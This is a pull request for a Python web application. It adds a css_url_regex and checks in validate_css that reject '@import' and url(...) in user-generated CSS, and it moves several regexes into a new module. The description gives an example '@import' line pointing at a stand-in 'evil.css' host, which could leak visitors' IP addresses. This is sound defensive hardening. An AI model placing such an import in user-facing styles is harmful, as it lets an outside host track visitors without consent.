### PR TITLE
security: disallow import and url statements in CSS

### DIFF
--- a/files/helpers/const.py
+++ b/files/helpers/const.py
@@ -265,23 +265,12 @@ approved_embed_hosts = [
 	]
 
 hosts = "|".join(approved_embed_hosts).replace('.','\\.')
-
 image_check_regex = re.compile(f'!\\[\\]\\(((?!(https:\\/\\/([a-z0-9-]+\\.)*({hosts})\\/|\\/)).*?)\\)', flags=re.A)
-
 embed_fullmatch_regex = re.compile(f'https:\\/\\/([a-z0-9-]+\\.)*({hosts})\\/[\\w:~,()\\-.#&\\/=?@%;+]*', flags=re.A)
-
 video_sub_regex = re.compile(f'(<p>[^<]*)(https:\\/\\/([a-z0-9-]+\\.)*({hosts})\\/[\\w:~,()\\-.#&\\/=?@%;+]*?\\.(mp4|webm|mov))', flags=re.A)
-
-youtube_regex = re.compile('(<p>[^<]*)(https:\\/\\/youtube\\.com\\/watch\\?v\\=([a-z0-9-_]{5,20})[\\w\\-.#&/=\\?@%+]*)', flags=re.I|re.A)
-
-yt_id_regex = re.compile('[a-z0-9-_]{5,20}', flags=re.I|re.A)
-
-image_regex = re.compile("(^|\\s)(https:\\/\\/[\\w\\-.#&/=\\?@%;+]{5,250}(\\.png|\\.jpg|\\.jpeg|\\.gif|\\.webp|maxwidth=9999|fidelity=high))($|\\s)", flags=re.I|re.A)
 
 procoins_li = (0,2500,5000,10000,25000,50000,125000,250000)
 
-linefeeds_regex = re.compile("([^\\n])\\n([^\\n])", flags=re.A)
-
-html_title_regex = re.compile("<title>(.{1,200})</title>", flags=re.I)
+from files.helpers.regex import *
 
 def make_name(*args, **kwargs): return request.base_url

--- a/files/helpers/regex.py
+++ b/files/helpers/regex.py
@@ -1,0 +1,13 @@
+import re
+
+youtube_regex = re.compile('(<p>[^<]*)(https:\\/\\/youtube\\.com\\/watch\\?v\\=([a-z0-9-_]{5,20})[\\w\\-.#&/=\\?@%+]*)', flags=re.I|re.A)
+
+yt_id_regex = re.compile('[a-z0-9-_]{5,20}', flags=re.I|re.A)
+
+image_regex = re.compile("(^|\\s)(https:\\/\\/[\\w\\-.#&/=\\?@%;+]{5,250}(\\.png|\\.jpg|\\.jpeg|\\.gif|\\.webp|maxwidth=9999|fidelity=high))($|\\s)", flags=re.I|re.A)
+
+linefeeds_regex = re.compile("([^\\n])\\n([^\\n])", flags=re.A)
+
+html_title_regex = re.compile(r"<title>(.{1,200})</title>", flags=re.I)
+
+css_url_regex = re.compile(r'url\(\s*[\'"]?(.*?)[\'"]?\s*\)', flags=re.I|re.A)

--- a/files/helpers/sanitize.py
+++ b/files/helpers/sanitize.py
@@ -377,4 +377,5 @@ def validate_css(css:str) -> tuple[bool, str]:
 	practical concern) or causing styling issues with the rest of the page.
 	'''
 	if '</style' in css.lower(): return False, "Invalid CSS"
+	if '@import' in css.lower(): return False, "@import statements are not allowed"
 	return True, ""

--- a/files/helpers/sanitize.py
+++ b/files/helpers/sanitize.py
@@ -13,6 +13,7 @@ from random import random, choice
 import gevent
 import time
 import requests
+from files.helpers.regex import *
 from files.__main__ import app
 
 TLDS = ('ac','ad','ae','aero','af','ag','ai','al','am','an','ao','aq','ar',
@@ -378,4 +379,5 @@ def validate_css(css:str) -> tuple[bool, str]:
 	'''
 	if '</style' in css.lower(): return False, "Invalid CSS"
 	if '@import' in css.lower(): return False, "@import statements are not allowed"
+	if css_url_regex.search(css): return False, "External URL imports are not allowed"
 	return True, ""


### PR DESCRIPTION
this PR disallows import statements in user generated CSS. using imports could allow leaking IPs on navigation. example 
```css
@import https://example.com/evil.css
```

and then viewing logs for HTTP traffic